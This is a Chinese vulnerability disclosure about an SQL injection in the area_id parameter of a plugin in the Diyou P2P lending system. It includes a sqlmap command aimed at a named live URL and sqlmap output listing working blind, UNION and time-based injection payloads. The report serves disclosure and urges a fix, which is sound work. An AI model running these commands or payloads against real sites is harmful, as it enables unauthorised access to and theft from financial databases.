帝友P2P借贷系统SQL注入通杀#1

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: =。= ### 详细说明: 模块:省市信息联动插件(通杀V4.0,3.1) 基于后台读数据库出数据的省市信息联动插件,省市区变量直接转int即可! Location:./?plugins&q=areas&area_id=174 http://www.diyou.cc/?plugins&q=areas&area_id=174 GET参数area_id未有效过滤导致存在注入 通知存在注入点,未做进一步测试,赶紧赶紧赶紧修复! ``` python sqlmap.py -u "http://www.diyou.cc/?plugins&q=areas&area_id=174" -p "area_id" --batch --dbs --tables -D www.diyou.cc sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: area_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: plugins&q=areas&area_id=174 AND 8880=8880 Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7161706171,0x4e736851515370696e6d,0x7167616671),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: plugins&q=areas&area_id=174 AND SLEEP(5) --- web server operating system: Linux Debian 6.0...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息